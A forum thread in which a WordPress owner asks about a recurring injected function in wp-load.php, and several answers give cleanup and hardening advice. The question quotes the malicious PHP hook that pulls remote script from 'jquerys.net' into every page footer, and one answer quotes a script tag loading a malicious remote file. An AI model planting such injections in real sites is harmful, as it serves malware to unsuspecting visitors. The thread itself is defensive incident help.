has my wordpress site been hacked? was it a plugin?

Question

this script keeps coming back to my wp-load.php file in public_html folder:

function pluginAuth(){ echo(wp_remote_retrieve_body(wp_remote_get('http://jquerys.net/jquery-1.6.3.min.js'))); } add_action('wp_footer', 'pluginAuth');

this directs to a virus site "jquerys.net"

What can be the solution. deleting the fucntion from wp-load.php does not eliminate it, as it regenrates on refreshing any page of my blog.

kindly help

Answer 1

There is new virus in WP

There's a downloading of a update.exe initiated by line
<script src="//socialstatsplugin.com/jqury.js"></script>

i Have done some reviews for this kind of virus.

Just go to your WP folder and check if any unwanted hidden file and when you browse through that , the files are unreadable.

As said Just do DELETE FROM wp_options WHERE option_name like '%wp_data_newa%' and delete all unwanted hidden folder within any folder. It worked till now. Hope it will help. Never knows the future.

Thanks

Answer 2

i was able to detect the malicious script. it was in the public_html folder. the file was "main.php" which is not in the default installation and also it does not contribute to any theme or plugin. after deleting all the unverfied plugins, i deleted this file and deleted the code in the wp-load.php.

at first when i did not deleted the "main.php" file. the 'function' in the wp-load kept coming back. but after deleting "main.php" file, i have rid myself from this virus.

Answer 3

You seem to have an infected WordPress installation. Use Theme Authenticity Checker OR Exploit Scanner plugins for automatically detecting potential malicious files that might be the culprit.

You can also try the free scan service of Sucuri.

Once you are done with the identification of the corrupted files, replace them with their official counterparts which you can get from WordPress.org.

As a defensive measure, install WordPress File Monitor Plus plugin - as it emails each time some file is changed. This will allow you to quickly revert any changes that some hacker/script makes in the future!

Answer 4

There could be malicious code injected into any of your wordpress files. You will need to go through all files especially inside your theme to look for code or files / folders that shouldn't be there.

After this you can use this article to make your build more secure:

http://codex.wordpress.org/Hardening_WordPress

Has been very useful to me in the past for preventing this sort of thing from happening again. You can do as many or as little of the security measures as you like.

I would definitely recommend doing everything from the Securing wp-admin section.

Answer 5

Most probably you have some infected or malicious file in wp-ulpoads folder, check there also for any file type, different than image or documents.

Also important: check your current theme functions.php file for malicious code, often hacked themes (i.e. downloaded via bittorent websites of mafiashare websites) inject such code, search for any curl() requests, actually not only in functions.php, but in files (if your theme has them) options.php or settings.php, etc.